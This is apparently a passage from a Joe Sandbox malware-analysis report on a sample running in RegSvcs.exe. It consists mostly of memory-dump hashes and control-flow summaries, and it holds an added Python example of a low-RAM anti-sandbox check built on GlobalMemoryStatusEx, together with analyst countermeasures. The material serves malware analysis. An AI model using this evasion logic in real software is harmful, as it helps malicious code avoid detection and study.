                                                            • Source File: 0000000B.00000002.2235554572.0000000002A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A2D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2a2d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235554572.0000000002A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A2D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2a2d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235005686.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_116d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235005686.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_116d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235554572.0000000002A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A2D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2a2d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235005686.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_116d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235005686.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_116d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:

                                                            Execution Graph

                                                            Execution Coverage:9.4%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:27
                                                            Total number of Limit Nodes:2
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:

                                                            Control-flow Graph: function at 12041b8, blocks 12041b8-1204538; calls 1200ab8 several times (graph edge data and executed/not-executed marking omitted).
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n
                                                            • API String ID: 0-1005319620
                                                            • Opcode ID: ddbda6e2936b94984e082d3b7c0715b5ae046ce62f15c49093f7e3c227c56d83
                                                            • Instruction ID: c3b8e6862754a8c96253af010f8623a172d6ce69e5590654350d7daefada845b
                                                            • Opcode Fuzzy Hash: ddbda6e2936b94984e082d3b7c0715b5ae046ce62f15c49093f7e3c227c56d83
                                                            • Instruction Fuzzy Hash: 9BB17F70E1024A8FDF11DFA9C8857EDBBF2BF88714F14C229DA15A7295EB749841CB81

                                                            Control-flow Graph: function at 1203e70, blocks 1203e70-1204170; calls 1200ab8 several times (graph edge data and executed/not-executed marking omitted).
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n
                                                            • API String ID: 0-1005319620
                                                            • Opcode ID: 887c6aeeb969999ff7a6f746d757295c62a533cb95ef1f4bc3d71972203ffa6c
                                                            • Instruction ID: 101335964a6a0fd946d995d71b65833daaa2fbfd773e948011c6d54322f78274
                                                            • Opcode Fuzzy Hash: 887c6aeeb969999ff7a6f746d757295c62a533cb95ef1f4bc3d71972203ffa6c
                                                            • Instruction Fuzzy Hash: B5919F70E1024ACFDF15DFA9C9857EDBBF2BF88314F148229E604A7295EB749845CB81
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50bc0a3b484e9e7c2abaa8498645e59bedabf41b9bb6331bb3331978b5b3dd43
                                                            • Instruction ID: a536ba568f8a5e8c59917181a470a384a3770c809751a8489818dc1ea6211f4d
                                                            • Opcode Fuzzy Hash: 50bc0a3b484e9e7c2abaa8498645e59bedabf41b9bb6331bb3331978b5b3dd43
                                                            • Instruction Fuzzy Hash: 7BB19E70E1064A8FDB11DFA9C8917ADBBF2BF88314F14C229DA15E7295EB749841CB81

                                                            Control-flow Graph: function at 1204800, blocks 1204800-1204a4c; calls 1200ab8 several times (graph edge data and executed/not-executed marking omitted).
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n$\V[n
                                                            • API String ID: 0-3705941238
                                                            • Opcode ID: 01cb1ed43295fa7a1fc465e523103d8f521777ef12c068920983d2ca0f85b79d
                                                            • Instruction ID: e248b593183c91c4f3281e25746431d907ea9f3a93b06e8dbfdc6f828c23efd6
                                                            • Opcode Fuzzy Hash: 01cb1ed43295fa7a1fc465e523103d8f521777ef12c068920983d2ca0f85b79d
                                                            • Instruction Fuzzy Hash: 44716E70E1028D8FDB15DFA9C88079EBBF2BF88714F14C229E614A7295EB749841CF95

                                                            Control-flow Graph: function at 12047f4, blocks 12047f4-1204a4c; calls 1200ab8 several times (graph edge data and executed/not-executed marking omitted).
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n$\V[n
                                                            • API String ID: 0-3705941238
                                                            • Opcode ID: 76aa3c13572444b94da8940f8df820a1c47c3e08774a919b704f5b591044d50e
                                                            • Instruction ID: cfd785d87bce205d4bfe08c2da851e49665da29f208cd6d973ae59f8be3aa9dc
                                                            • Opcode Fuzzy Hash: 76aa3c13572444b94da8940f8df820a1c47c3e08774a919b704f5b591044d50e
                                                            • Instruction Fuzzy Hash: 5B717D70D1028E8FDB11DFA9C88179DBBF1BF88714F14C229E604A7295EB749841CF95

                                                            Control-flow Graph: function at 587ea10, blocks 587ea10-587eb8d; calls 587cef0 or 587cefc on entry, then GlobalMemoryStatusEx in block 587eacf-587eb5c (graph edge data and executed/not-executed marking omitted).
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4615459034.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_5870000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3c39d6b5045ccf82e797d5741bc3038519ba66613bed0c5cea589fd35044a073
                                                            • Instruction ID: c9aaad51215e3af50751dbb47444898c48ec8438b648f2d46e99bb953f27b8b7
                                                            • Opcode Fuzzy Hash: 3c39d6b5045ccf82e797d5741bc3038519ba66613bed0c5cea589fd35044a073
                                                            • Instruction Fuzzy Hash: F5412272E043898FCB04CFB9D8042EEBBF4BF89210F14856AD808E7251DB749845CB91

                                                            Control-flow Graph: function at 587cefc, blocks 587cefc-587eb8d; calls GlobalMemoryStatusEx (graph edge data and executed/not-executed marking omitted).
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0587EA62), ref: 0587EB4F
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4615459034.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_5870000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: 623c04f0a775659581f405e952d35e8bd232323a7450e02533e9b6447bb12302
                                                            • Instruction ID: 0d3c4d22fad671f1cb92c74db8e3989bfd9cef427de1f5674aea61be789995ff
                                                            • Opcode Fuzzy Hash: 623c04f0a775659581f405e952d35e8bd232323a7450e02533e9b6447bb12302
                                                            • Instruction Fuzzy Hash: B61136B1C046599BDB10CFAAC44479EFBF4BF48220F10816AE918B7240D378A914CFA5
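                                                            GlobalMemoryStatusEx, which the functions at 587ea10 and 587cefc above call, is a common building block of anti-sandbox checks: the caller reads ullTotalPhys from the MEMORYSTATUSEX structure and refuses to run on a machine with little RAM, since analysis VMs are often provisioned small. The Python below is an added example, not the sample's code and not part of this report; it decodes what the API fills in and evaluates the typical check. The 4 GiB threshold, the helper names and the constructed sample buffers are assumptions for illustration; the report does not state what this sample compares the value against.

```python
"""
Added example (not the sample's code and not part of the Joe Sandbox report):
what GlobalMemoryStatusEx returns and how an anti-sandbox RAM check evaluates it.
The 4 GiB threshold is an illustrative assumption.
"""
import struct
import sys
from dataclasses import dataclass
from typing import Optional

# MEMORYSTATUSEX layout (kernel32): DWORD dwLength, DWORD dwMemoryLoad, then
# seven DWORDLONG fields.  64 bytes, little-endian, no padding.
MEMORYSTATUSEX_FMT = "<IIQQQQQQQ"
MEMORYSTATUSEX_SIZE = struct.calcsize(MEMORYSTATUSEX_FMT)  # 64
GIB = 1024 ** 3


@dataclass
class MemoryStatus:
    memory_load_pct: int
    total_phys: int
    avail_phys: int
    total_pagefile: int
    avail_pagefile: int
    total_virtual: int
    avail_virtual: int


def parse_memorystatusex(buf: bytes) -> MemoryStatus:
    """Decode the 64-byte structure that GlobalMemoryStatusEx fills in."""
    if len(buf) != MEMORYSTATUSEX_SIZE:
        raise ValueError(f"expected {MEMORYSTATUSEX_SIZE} bytes, got {len(buf)}")
    length, load, tphys, aphys, tpf, apf, tvirt, avirt, _ext = struct.unpack(
        MEMORYSTATUSEX_FMT, buf)
    if length != MEMORYSTATUSEX_SIZE:
        raise ValueError("dwLength does not match sizeof(MEMORYSTATUSEX)")
    return MemoryStatus(load, tphys, aphys, tpf, apf, tvirt, avirt)


def query_memory_status() -> Optional[MemoryStatus]:
    """Call the real API through ctypes on Windows; return None elsewhere."""
    if sys.platform != "win32":
        return None
    import ctypes
    buf = ctypes.create_string_buffer(MEMORYSTATUSEX_SIZE)
    # dwLength must be set before the call, exactly as native callers do.
    struct.pack_into("<I", buf, 0, MEMORYSTATUSEX_SIZE)
    if not ctypes.windll.kernel32.GlobalMemoryStatusEx(buf):
        raise ctypes.WinError()
    return parse_memorystatusex(buf.raw)


def looks_like_sandbox(status: MemoryStatus, min_phys_bytes: int = 4 * GIB) -> bool:
    """The check pattern: too little physical RAM => probably an analysis VM.
    The threshold is an assumption chosen for illustration."""
    return status.total_phys < min_phys_bytes


def build_memorystatusex(total_phys: int, avail_phys: int, load: int = 50) -> bytes:
    """Constructed sample buffer, shaped like what an analyst-controlled
    hook on GlobalMemoryStatusEx would hand back to the caller."""
    return struct.pack(MEMORYSTATUSEX_FMT, MEMORYSTATUSEX_SIZE, load,
                       total_phys, avail_phys, total_phys * 2, avail_phys * 2,
                       128 * 1024 ** 4, 120 * 1024 ** 4, 0)


if __name__ == "__main__":
    status = query_memory_status()
    if status is None:  # not on Windows: use a constructed 2 GiB machine
        status = parse_memorystatusex(build_memorystatusex(2 * GIB, GIB))
    print(f"total RAM {status.total_phys / GIB:.1f} GiB, "
          f"sandbox-like: {looks_like_sandbox(status)}")
```

                                                            For dynamic analysis the practical consequence is that the VM should either be provisioned above whatever threshold the sample uses, or GlobalMemoryStatusEx should be hooked to return an inflated ullTotalPhys, as build_memorystatusex does here; the executed/not-executed colouring of the 587ea10 and 587cefc graphs is where such a check would show up as an untaken branch.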

                                                            Control-flow Graph: function at 12041ac, blocks 12041ac-1204538; calls 1200ab8 several times (graph edge data and executed/not-executed marking omitted).
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n
                                                            • API String ID: 0-1005319620
                                                            • Opcode ID: 2bded5884e352d47d73418d99ad27766938e6f74a3eb432fe9e3abe81ea4133f
                                                            • Instruction ID: e7955a2dc1b0f10f3a4f2036df2765657818e86c7f0ee9e1c08427b979d602b2
                                                            • Opcode Fuzzy Hash: 2bded5884e352d47d73418d99ad27766938e6f74a3eb432fe9e3abe81ea4133f
                                                            • Instruction Fuzzy Hash: 86B16E70E1024ACFDB11DFA9C88579DBBF1FF88714F14C229DA14A7295EB749845CB81

                                                            Control-flow Graph: function at 1203e66, blocks 1203e66-1204170; calls 1200ab8 several times (graph edge data and executed/not-executed marking omitted).
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n
                                                            • API String ID: 0-1005319620
                                                            • Opcode ID: 8fdeedc57b5679b61e04c690fd5617a2de1c59e4975fb3683f7d882ea0804c77
                                                            • Instruction ID: 017da0e72c885c6c85286f73ca4a779c5f88583a0c5d7041724058d47c8ef8a8
                                                            • Opcode Fuzzy Hash: 8fdeedc57b5679b61e04c690fd5617a2de1c59e4975fb3683f7d882ea0804c77
                                                            • Instruction Fuzzy Hash: EC918D70E2024ACFDF15DFA9C9857DDBBF2BF88314F148229E604A7295EB749845CB81

                                                            Control-flow Graph: function at 1200848, blocks 1200848-120091d; the call at 1200853 resolves to 120147a or 120136f (graph edge data and executed/not-executed marking omitted).
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Co
                                                            • API String ID: 0-3798529171
                                                            • Opcode ID: c413d7bb8854c187ee4c30e8a00369b64a4bd46e2827f74a411f218abf69327e
                                                            • Instruction ID: 3ca3039d1d710e1bb471435a57f7db8198bab2933a1e17a61d2df660fae8a704
                                                            • Opcode Fuzzy Hash: c413d7bb8854c187ee4c30e8a00369b64a4bd46e2827f74a411f218abf69327e
                                                            • Instruction Fuzzy Hash: 94118231B2020A8BFF175B7DC80476A3655FB45694F204A39E206CF2C7DA61CD818BC5

                                                            Control-flow Graph: function at 1200838, blocks 1200838-120091d; the call at 1200853 resolves to 120147a or 120136f (graph edge data and executed/not-executed marking omitted).
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Co
                                                            • API String ID: 0-3798529171
                                                            • Opcode ID: 307dc14021d586be30dc08a8e10389c37a6f04419b4ce354f048195145ccf61b
                                                            • Instruction ID: fc1c6e747ba64a44a48fbff3182cd8929dc0d04bb0f0b591877e13a4b0ea37f4
                                                            • Opcode Fuzzy Hash: 307dc14021d586be30dc08a8e10389c37a6f04419b4ce354f048195145ccf61b
                                                            • Instruction Fuzzy Hash: C011A331A2020A8BFF175A79C90436A3755FB41294F244A3AF602CB2C7DA64CE804BC9

                                                            Control-flow Graph: function at 12086df, blocks 12086b7-1208f1b; a long chain of conditional blocks loops back to 1208751, and the call at 1208998 resolves to 1209f90, 1209f81 or 120a033 (graph edge data and executed/not-executed marking omitted).
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bbd8387ea848cbb2faeb459fdbfcea275a2ae6afcd40edd185817dd333c79175
                                                            • Instruction ID: b43893a4e9a6c8588ec3347ab7d09c97c57b7cd3a3ee417dc8106b1910057ed6
                                                            • Opcode Fuzzy Hash: bbd8387ea848cbb2faeb459fdbfcea275a2ae6afcd40edd185817dd333c79175
                                                            • Instruction Fuzzy Hash: F0227F35F50202CBDB1AAB3CE49532A37A2FBC6354B504A2CD205CB796CF79DC568B85
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ca1f9ee9d053a9125d09ad13373f3a36b462965bb07c86990fad8127b1d1773a
                                                            • Instruction ID: 6c42b37fef0246a527c719d5e7f3280627e4a32da298b40c3d4ef355d5c35a63
                                                            • Opcode Fuzzy Hash: ca1f9ee9d053a9125d09ad13373f3a36b462965bb07c86990fad8127b1d1773a
                                                            • Instruction Fuzzy Hash: 7A126F34F50202CBDB1AAB3CE49432A37A2FBC6355B504A2CD205CB796DF79DC568B85
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cff356281d4c8817d8fc649898ea3c10b56ec3589cae8c561e0605a131cf5b8a
                                                            • Instruction ID: 176b77711fd0800c8ac2ebe251070dd3a0379b1bb18a53d743d499edd9460d83
                                                            • Opcode Fuzzy Hash: cff356281d4c8817d8fc649898ea3c10b56ec3589cae8c561e0605a131cf5b8a
                                                            • Instruction Fuzzy Hash: E341A031D1070ADFDB04DFA8C89469DFBB1FF89300F14C569D645AB265EB70A981CB90
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a0ea1b0369d2969a0d9a19a5eea94d66b0fa1db037ef060061c18bf89432c53b
                                                            • Instruction ID: 302095ba7177e4e0a7ffd12d0cb69d630a96b146b7edab225aceaae9aba0b884
                                                            • Opcode Fuzzy Hash: a0ea1b0369d2969a0d9a19a5eea94d66b0fa1db037ef060061c18bf89432c53b
                                                            • Instruction Fuzzy Hash: E2E1C135B102068FDB16DF68D594A6DBBB2FF88310F604629E906D7396DB35EC42CB90
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dbe1f59bdcb309bc4d4583f70c6b69b217427bbbce1d841358b9e7007fcaf6ad
                                                            • Instruction ID: 7ab9d965b9ab99a9f0e9f94030f986c00ed68c00ef7fbfa0eaf0a263b8ca78bd
                                                            • Opcode Fuzzy Hash: dbe1f59bdcb309bc4d4583f70c6b69b217427bbbce1d841358b9e7007fcaf6ad
                                                            • Instruction Fuzzy Hash: C7D18A70E10309CFDB18DFA9C9546AEBBF2FF88310F548569E505AB291DB70AD41CBA0
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 745457ab1659d918680f704f5a91b09351c3599c47c6f53a173bef5f7cfd64ea
                                                            • Instruction ID: 2c203cfb9558d00084705101fd58881be5dd56a0d78ab93f91f7c93e820ec3ba
                                                            • Opcode Fuzzy Hash: 745457ab1659d918680f704f5a91b09351c3599c47c6f53a173bef5f7cfd64ea
                                                            • Instruction Fuzzy Hash: F5A18F70E2064ACFDB11DFA9C88179DBBF2BF88714F14C229DA14E7295EB749845CB81
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f0f25cf1eb432255dfa01b2560fe1941a29f4f5e65b9942e9f60e871aec70f3c
                                                            • Instruction ID: b94b8ebd5e6b9eacc0aeeffa7cbc25a5d54c1e45fa775e4581944c53dc7d99a0
                                                            • Opcode Fuzzy Hash: f0f25cf1eb432255dfa01b2560fe1941a29f4f5e65b9942e9f60e871aec70f3c
                                                            • Instruction Fuzzy Hash: 025170717112069FDB16CFA8C880B7AB7A6FF84310F248659E515DB2DACB31EC82C791
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52338c9356f9b991bcc10a74b7abe93b7af72b80e52a350848012c73d3132840
                                                            • Instruction ID: e5cb018c3a230f2217fb104297e00c684209b07ac13d6f97a7265d345506f391
                                                            • Opcode Fuzzy Hash: 52338c9356f9b991bcc10a74b7abe93b7af72b80e52a350848012c73d3132840
                                                            • Instruction Fuzzy Hash: BB518B34B20115CFDB15DB68C458AAE7BB6BF89700F200669E506DB3A2DB75AC40CBA1
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 12491665be8def1d72811909d59279e61b3b06149853bdb552654e2fca4a70c1
                                                            • Instruction ID: 38833d02dd6d2569b28720afd0ba1810a13402ac70d29eb0102c4efc83f223d4
                                                            • Opcode Fuzzy Hash: 12491665be8def1d72811909d59279e61b3b06149853bdb552654e2fca4a70c1
                                                            • Instruction Fuzzy Hash: C9514B75A00205CFDB05DF69E88479DFBB1FF88310F54C2AAE9099B396E770A945CB90
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 79364ba2edbc59919e3b14f4fc7811123af384f0f7b06da48838391df7a4580c
                                                            • Instruction ID: 75762220213c92c5d6bc33c9e9a9862dda25083c7302d9cededaa353374bfbca
                                                            • Opcode Fuzzy Hash: 79364ba2edbc59919e3b14f4fc7811123af384f0f7b06da48838391df7a4580c
                                                            • Instruction Fuzzy Hash: 98511470D202198FDB15CFA9C885B9DBBF1BF48710F148219E915BB392D774A844CF94
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3a4d7fdc211f63a358c28789a12d60f313d7f13cf803709786b97393eeece2fb
                                                            • Instruction ID: 4e50523078f5e8e1ee18b0163aa964b84a4fb8302c415364374a7ed217075e45
                                                            • Opcode Fuzzy Hash: 3a4d7fdc211f63a358c28789a12d60f313d7f13cf803709786b97393eeece2fb
                                                            • Instruction Fuzzy Hash: 0C511470D202198FDB19CFA9C884B9DBBF1BF48310F14822AE915BB392D774A844CF95
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3de559b2716b4c7ba32a922070017bd73f51e54c1e9d63bceddaa8d67eed7235
                                                            • Instruction ID: 3aeeb9e33019a1c1a8862b75a2cb883fdb9d47b9239a6537e31ffeb915957e98
                                                            • Opcode Fuzzy Hash: 3de559b2716b4c7ba32a922070017bd73f51e54c1e9d63bceddaa8d67eed7235
                                                            • Instruction Fuzzy Hash: 61512732A05282CFC71AEF28F9C09983FB1FB95305710A97DD1515B3AEEA606D45CB82
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 96503c8d6ad897e81c194d2cec6a3d70fa823dbbfc99cbf3a01d03eefb1bae7d
                                                            • Instruction ID: dcfb9f61e65ffcf12738205821c450a46b788a1d3749cccf3bd7f9b9985a4c81
                                                            • Opcode Fuzzy Hash: 96503c8d6ad897e81c194d2cec6a3d70fa823dbbfc99cbf3a01d03eefb1bae7d
                                                            • Instruction Fuzzy Hash: CE51E632A05282CFC71AFF28F9809593FB1FB95305310A97DD1555B3AEEA706D45CB82
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 26260f113584fd57fd46a1a1dc9575fd182e1a2e3ee49733cd1507431dc0e001
                                                            • Instruction ID: a5e83c1e5d8201a12f6e69fb42c307a0d1a2c399cd39cbfa7f7009bcd8993a45
                                                            • Opcode Fuzzy Hash: 26260f113584fd57fd46a1a1dc9575fd182e1a2e3ee49733cd1507431dc0e001
                                                            • Instruction Fuzzy Hash: 9231AD71B002078FDB15EB78D890AAEBBB1EF89310F504569D506EB352DB75AC06CB90
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
